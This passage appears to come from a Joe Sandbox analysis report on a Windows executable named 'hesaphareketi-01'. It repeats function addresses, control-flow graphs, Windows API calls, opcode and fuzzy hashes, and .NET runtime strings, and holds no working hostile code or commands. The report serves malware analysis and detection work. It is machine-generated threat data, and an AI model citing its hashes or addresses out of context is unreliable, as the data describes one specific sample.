                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocExceptionHandleHandlerInformationModuleObjectQueryVectored_wcsicmp
                                                  • String ID: StressLogLevel$TotalStressLogSize
                                                  • API String ID: 2876344857-4058818204
                                                  • Opcode ID: 45dc59bb53227d1381efa592a7d616e654f0d65a7567b6ffba862109cea427b1
                                                  • Instruction ID: ddb7887fad6571bbf4334c59342f9f1e72e89a434e2aac3e17a0ffde31bb7621
                                                  • Opcode Fuzzy Hash: 45dc59bb53227d1381efa592a7d616e654f0d65a7567b6ffba862109cea427b1
                                                  • Instruction Fuzzy Hash: 5041B6B3908E42A1EE48BF26B4C12B9E391EF82784FC40035E94D9769ADE3CE505D760
                                                  Function 00007FF7341E8F50 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 375 7ff7341e8f50-7ff7341e8f7e call 7ff7341dde30 call 7ff7341e26b0 380 7ff7341e8f80-7ff7341e8f85 375->380 381 7ff7341e8f87-7ff7341e8f95 375->381 382 7ff7341e8f99-7ff7341e8fe7 call 7ff7341d9b20 call 7ff7341e2280 call 7ff7341e3690 380->382 381->382 389 7ff7341e8ff9-7ff7341e9000 call 7ff7341e2070 382->389 390 7ff7341e8fe9-7ff7341e8ff7 382->390 393 7ff7341e9005 389->393 391 7ff7341e900c-7ff7341e9088 call 7ff7341e35a0 call 7ff7341e3600 call 7ff7341e35b0 call 7ff7341e35d0 call 7ff7341e3630 390->391 404 7ff7341e918e-7ff7341e9198 391->404 405 7ff7341e908e-7ff7341e9095 391->405 393->391 406 7ff7341e963d-7ff7341e9653 404->406 408 7ff7341e919e-7ff7341e91a5 404->408 405->406 407 7ff7341e909b-7ff7341e90a2 405->407 407->406 409 7ff7341e90a8-7ff7341e90c2 call 7ff7341e3610 call 7ff7341e35c0 call 7ff7341e35e0 407->409 410 7ff7341e91a9-7ff7341e91ac 408->410 434 7ff7341e90c4-7ff7341e90c6 409->434 435 7ff7341e90ef-7ff7341e90f5 409->435 412 7ff7341e91b3-7ff7341e91b6 410->412 414 7ff7341e91ca-7ff7341e91cd 412->414 415 7ff7341e91b8-7ff7341e91bb 412->415 418 7ff7341e9246 414->418 419 7ff7341e91cf-7ff7341e91e1 call 7ff7341e35f0 414->419 415->414 417 7ff7341e91bd-7ff7341e91c4 415->417 417->406 417->414 420 7ff7341e924d-7ff7341e9250 418->420 430 7ff7341e9205 419->430 431 7ff7341e91e3-7ff7341e9203 419->431 423 7ff7341e9272-7ff7341e928d call 7ff7341e3670 420->423 424 7ff7341e9252-7ff7341e9259 420->424 438 7ff7341e92e1-7ff7341e92f9 call 7ff7341e3d60 call 7ff7341e3d80 423->438 439 7ff7341e928f-7ff7341e9299 423->439 424->423 427 7ff7341e925b-7ff7341e9271 424->427 432 7ff7341e920c-7ff7341e920f 430->432 431->432 432->418 437 7ff7341e9211-7ff7341e9218 432->437 434->406 440 7ff7341e90cc-7ff7341e90cf 434->440 435->406 436 7ff7341e90fb-7ff7341e9101 435->436 436->406 441 7ff7341e9107-7ff7341e910b 436->441 437->424 442 7ff7341e921a-7ff7341e9244 437->442 456 7ff7341e92fb-7ff7341e9306 call 7ff7341e3710 438->456 457 7ff7341e934c-7ff7341e9366 call 7ff7341e3710 438->457 444 7ff7341e92b3-7ff7341e92ca 439->444 445 7ff7341e929b-7ff7341e92a2 439->445 440->406 446 7ff7341e90d5-7ff7341e90ea 440->446 441->406 448 7ff7341e9111-7ff7341e911a 441->448 442->420 447 7ff7341e92ce-7ff7341e92da 444->447 445->447 450 7ff7341e92a4-7ff7341e92a6 445->450 446->412 447->438 448->406 451 7ff7341e9120-7ff7341e918c 448->451 453 7ff7341e92ad-7ff7341e92b1 450->453 454 7ff7341e92a8-7ff7341e92ab 450->454 451->410 453->447 454->447 462 7ff7341e9313-7ff7341e9338 call 7ff7341eb6d0 456->462 463 7ff7341e9308-7ff7341e9310 call 7ff7341eb720 456->463 467 7ff7341e937c-7ff7341e9388 457->467 468 7ff7341e9368-7ff7341e9378 457->468 473 7ff7341e9399-7ff7341e93c9 call 7ff7341e3d70 call 7ff7341e3560 call 7ff7341e3680 462->473 474 7ff7341e933a-7ff7341e934a call 7ff7341eb6d0 462->474 463->462 471 7ff7341e9391-7ff7341e9396 467->471 472 7ff7341e938a-7ff7341e938f 467->472 468->467 471->473 472->473 483 7ff7341e93cb-7ff7341e93e6 473->483 484 7ff7341e93e7-7ff7341e93f1 473->484 474->473 485 7ff7341e93f3-7ff7341e93ff 484->485 486 7ff7341e941d-7ff7341e9424 484->486 487 7ff7341e9406-7ff7341e941b 485->487 488 7ff7341e9401-7ff7341e9404 485->488 489 7ff7341e9633 486->489 490 7ff7341e942a-7ff7341e9431 486->490 487->490 488->490 489->406 490->489 491 7ff7341e9437-7ff7341e9457 call 7ff7341ff450 490->491 493 7ff7341e945c-7ff7341e9490 call 7ff7341e3d20 call 7ff7341e3d50 call 7ff7341e3d30 call 7ff7341e3d40 491->493 502 7ff7341e9625 493->502 503 7ff7341e9496-7ff7341e94cd call 7ff7341e3620 493->503 506 7ff7341e962c 502->506 507 7ff7341e94cf-7ff7341e94ec 503->507 508 7ff7341e94ee-7ff7341e9504 503->508 506->489 509 7ff7341e953e-7ff7341e9551 507->509 510 7ff7341e9506-7ff7341e9530 508->510 511 7ff7341e9532-7ff7341e953c 508->511 512 7ff7341e9553-7ff7341e955c 509->512 513 7ff7341e955e 509->513 510->511 511->509 514 7ff7341e9564-7ff7341e9595 call 7ff7341e3660 call 7ff734238e70 512->514 513->514 514->506 519 7ff7341e959b-7ff7341e95ad call 7ff7341e1c00 514->519 519->489 522 7ff7341e95b3-7ff7341e95bf call 7ff7341e1cc0 519->522 525 7ff7341e95c1-7ff7341e95cd call 7ff7341d4a30 522->525 526 7ff7341e95d7-7ff7341e960a call 7ff7341fdc30 522->526 525->526 531 7ff7341e9611-7ff7341e9614 526->531 532 7ff7341e960c call 7ff734238dac 526->532 531->502 534 7ff7341e9616-7ff7341e9620 call 7ff7342128b0 call 7ff7341d4a30 531->534 532->531 534->502
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
                                                  • String ID: Creation of WaitForGCEvent failed$TraceGC is not turned on
                                                  • API String ID: 133006248-518909315
                                                  • Opcode ID: 542490f3281f9ec5935c23756829aefb1db30947c7d8b3d75492c27f59141b81
                                                  • Instruction ID: 5ce50fb4fd6f6dcf7b0c600626df54ad6e42c0ee62e5d4e84612f2d74fb2546c
                                                  • Opcode Fuzzy Hash: 542490f3281f9ec5935c23756829aefb1db30947c7d8b3d75492c27f59141b81
                                                  • Instruction Fuzzy Hash: 5A027065E1DA07A2FE1CFF23B8D1274A291AF45790FC44139D84ED77A1DE3CA880A625
                                                  Function 00007FF7341FC160 Relevance: 1.9, Strings: 1, Instructions: 694COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: EXv
                                                  • API String ID: 0-3696471021
                                                  • Opcode ID: 2c7a140566dae9a4fba68076e8192626d085c825284fdfb18a21c1693e6838f9
                                                  • Instruction ID: 7b04b9063a4d0bfba8079ee369c732afbf140fb96a693970389e1dee4e95fe12
                                                  • Opcode Fuzzy Hash: 2c7a140566dae9a4fba68076e8192626d085c825284fdfb18a21c1693e6838f9
                                                  • Instruction Fuzzy Hash: 3862A672A19A46A5EB5DAF27A5C0375F3D1BF45780F908239DA0DE3660EF3CA841B610
                                                  Function 00007FF734200560 Relevance: .4, Instructions: 398COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentProcess
                                                  • String ID:
                                                  • API String ID: 2050909247-0
                                                  • Opcode ID: 604403f3aac9de18e02c808f39cfdf9296956c65b9ee2d11eb55e13a3e953c9f
                                                  • Instruction ID: 453c21dc387c1d307230c54c061feb10a5d6febd6eabd09976c257bc9fe93d99
                                                  • Opcode Fuzzy Hash: 604403f3aac9de18e02c808f39cfdf9296956c65b9ee2d11eb55e13a3e953c9f
                                                  • Instruction Fuzzy Hash: 48029562E0D646A6FA2DAF27B8C4234E7D1BF46744F844639C54DF3260DF3DB840A622
                                                  Function 00007FF7341FEB10 Relevance: .3, Instructions: 332COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4758fcd36253205b66e6ee8f40eaefffe5d4d9abfaad721640ae2f4df7b9cc35
                                                  • Instruction ID: 2ab781a13b8cda81212beb86189d4bcd75a276edaea15a2e48024818aa82e361
                                                  • Opcode Fuzzy Hash: 4758fcd36253205b66e6ee8f40eaefffe5d4d9abfaad721640ae2f4df7b9cc35
                                                  • Instruction Fuzzy Hash: 39F17022D1DB4766FA1EFF27A9C1274E2956F56340FC4533AD50DE32A2EF3C6491A220
                                                  Function 00007FF7341E2070 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                                                  • String ID: @$@$@
                                                  • API String ID: 2645093340-1177533131
                                                  • Opcode ID: f97ad304849a1431e4f3e87175d7cbd2d95d287c41a756e0b52c30f8d3b71cfe
                                                  • Instruction ID: f5c4f7a2ed0f84d468dcc2cd8ac1baab5263cc5497099b3327b7077d4e7f2f35
                                                  • Opcode Fuzzy Hash: f97ad304849a1431e4f3e87175d7cbd2d95d287c41a756e0b52c30f8d3b71cfe
                                                  • Instruction Fuzzy Hash: 63514036709AD196EB759F12F8903AAF3A0FB88B50F844135CA9D93B88CF3DD4459714
                                                  Function 00007FF7341DAE30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF7341D55CB), ref: 00007FF7341DAE3B
                                                    • Part of subcall function 00007FF7341E24C0: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E24CF
                                                    • Part of subcall function 00007FF7341E24C0: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E250D
                                                    • Part of subcall function 00007FF7341E24C0: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E2539
                                                    • Part of subcall function 00007FF7341E24C0: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E254A
                                                    • Part of subcall function 00007FF7341E24C0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E2559
                                                    • Part of subcall function 00007FF7341DD5C0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7341DD6BD
                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF7341D55CB), ref: 00007FF7341DAEAA
                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF7341DAEBD
                                                  • QueryInformationJobObject.KERNEL32 ref: 00007FF7341DAF0E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem_wcsicmp
                                                  • String ID: PROCESSOR_COUNT
                                                  • API String ID: 296690692-4048346908
                                                  • Opcode ID: b270e94377580d3288a1bcf3e941d1207372f9dfc2ea9df1a3f3ba46b40a03d9
                                                  • Instruction ID: 184e066ee406d4384f849d3142e6575cc5df99f50ed20037761f647b6776fc80
                                                  • Opcode Fuzzy Hash: b270e94377580d3288a1bcf3e941d1207372f9dfc2ea9df1a3f3ba46b40a03d9
                                                  • Instruction Fuzzy Hash: 383183B2A08A4252EE5CEF5AE4C02BDE3A1EF45794FC40035D64DC7695DE3CE449E720
                                                  Function 00007FF7341D6480 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF7341D6586
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFailFastRaise$Sleep
                                                  • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                                                  • API String ID: 3706814929-926682358
                                                  • Opcode ID: fec1ccdd5174ac2505eae89ee321da76851430eb507b79bb22477138be6a87ff
                                                  • Instruction ID: d3094dc0b6db9bf1ebeebdb73110983e8a87e5a493e3233e1c668a86af481231
                                                  • Opcode Fuzzy Hash: fec1ccdd5174ac2505eae89ee321da76851430eb507b79bb22477138be6a87ff
                                                  • Instruction Fuzzy Hash: 98414276929A41A2EF98BF16F490379B3A0EF15B88F844039C94D833A4DF3DE440D350
                                                  Function 00007FF7341DB130 Relevance: 6.0, APIs: 4, Instructions: 26threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
                                                  • String ID:
                                                  • API String ID: 2150560229-0
                                                  • Opcode ID: 797a42ad1a02e68e8dda0a1c160f46f9bccc89019008f5d8015a25128a62028d
                                                  • Instruction ID: f17ba89e616bbe0081b42f42c9416947bdf2876a94d0f3af73327a59b1e0eb0c
                                                  • Opcode Fuzzy Hash: 797a42ad1a02e68e8dda0a1c160f46f9bccc89019008f5d8015a25128a62028d
                                                  • Instruction Fuzzy Hash: 21E06DA5B0471292EB19AF22BC5837AA350AF98B85F884038CD4E57364EF3C91859610
                                                  Function 00007FF7341E1E90 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 119 7ff7341e1e90-7ff7341e1ec1 120 7ff7341e1f7f-7ff7341e1f9c GlobalMemoryStatusEx 119->120 121 7ff7341e1ec7-7ff7341e1ee2 GetCurrentProcess call 7ff734238a6f 119->121 123 7ff7341e2022-7ff7341e2025 120->123 124 7ff7341e1fa2-7ff7341e1fa5 120->124 121->120 134 7ff7341e1ee8-7ff7341e1ef0 121->134 125 7ff7341e202e-7ff7341e2031 123->125 126 7ff7341e2027-7ff7341e202b 123->126 128 7ff7341e2011-7ff7341e2014 124->128 129 7ff7341e1fa7-7ff7341e1fb2 124->129 132 7ff7341e2033-7ff7341e2038 125->132 133 7ff7341e203b-7ff7341e203e 125->133 126->125 130 7ff7341e2016 128->130 131 7ff7341e2019-7ff7341e201c 128->131 135 7ff7341e1fb4-7ff7341e1fb9 129->135 136 7ff7341e1fbb-7ff7341e1fcc 129->136 130->131 137 7ff7341e201e-7ff7341e2020 131->137 138 7ff7341e2048-7ff7341e206b call 7ff734238e50 131->138 132->133 133->138 139 7ff7341e2040 133->139 140 7ff7341e1ef2-7ff7341e1ef8 134->140 141 7ff7341e1f5a-7ff7341e1f5f 134->141 142 7ff7341e1fd0-7ff7341e1fe1 135->142 136->142 145 7ff7341e2045 137->145 139->145 146 7ff7341e1f01-7ff7341e1f15 140->146 147 7ff7341e1efa-7ff7341e1eff 140->147 143 7ff7341e1f71-7ff7341e1f74 141->143 144 7ff7341e1f61-7ff7341e1f64 141->144 149 7ff7341e1fe3-7ff7341e1fe8 142->149 150 7ff7341e1fea-7ff7341e1ffe 142->150 143->138 154 7ff7341e1f7a 143->154 152 7ff7341e1f66-7ff7341e1f69 144->152 153 7ff7341e1f6b-7ff7341e1f6e 144->153 145->138 155 7ff7341e1f19-7ff7341e1f2a 146->155 147->155 151 7ff7341e2002-7ff7341e200e 149->151 150->151 151->128 152->143 153->143 154->145 157 7ff7341e1f33-7ff7341e1f47 155->157 158 7ff7341e1f2c-7ff7341e1f31 155->158 159 7ff7341e1f4b-7ff7341e1f57 157->159 158->159 159->141
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentGlobalMemoryProcessStatus
                                                  • String ID: @
                                                  • API String ID: 3261791682-2766056989
                                                  • Opcode ID: 08fb357760ee07a770a744109e7a6e344503c8149823deb5f180863c7e2f9c72
                                                  • Instruction ID: 9c737f8a50a79c5cb41553b8acdc989b8ec6d69c4095b94159e4a1de3dac0fe0
                                                  • Opcode Fuzzy Hash: 08fb357760ee07a770a744109e7a6e344503c8149823deb5f180863c7e2f9c72
                                                  • Instruction Fuzzy Hash: 03412235A09F0652E99ADE37A1A0339D2526F5ABC0F58C731E90EA3784FF3DE4C19610
                                                  Function 00007FF734201470 Relevance: 5.1, APIs: 4, Instructions: 112COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF7341ED326,?,-8000000000000000,00000001,00007FF7341FC4E6), ref: 00007FF7342014FA
                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF7341ED326,?,-8000000000000000,00000001,00007FF7341FC4E6), ref: 00007FF734201569
                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF7341ED326,?,-8000000000000000,00000001,00007FF7341FC4E6), ref: 00007FF7342015B2
                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF7341ED326,?,-8000000000000000,00000001,00007FF7341FC4E6), ref: 00007FF7342015C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave
                                                  • String ID:
                                                  • API String ID: 3168844106-0
                                                  • Opcode ID: b425638a6e70c30cd72ce7cc57c0788705c17328c805340536d3a1b7a1700000
                                                  • Instruction ID: 59d622d09cedc81576e92fd542a0794a8e3f9abd7cde62d30b24a1ef0d36cc44
                                                  • Opcode Fuzzy Hash: b425638a6e70c30cd72ce7cc57c0788705c17328c805340536d3a1b7a1700000
                                                  • Instruction Fuzzy Hash: 87518422A08A42B1EB28EF12E8C4274E7A0FF05794FC40135DA5DE7AA5CF3DE555E321
                                                  Function 00007FF7342102E0 Relevance: 5.1, APIs: 4, Instructions: 84COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF7341FD839), ref: 00007FF734210320
                                                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF7341FD839), ref: 00007FF734210396
                                                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF7341FD839), ref: 00007FF7342103EE
                                                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF7341FD839), ref: 00007FF734210414
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
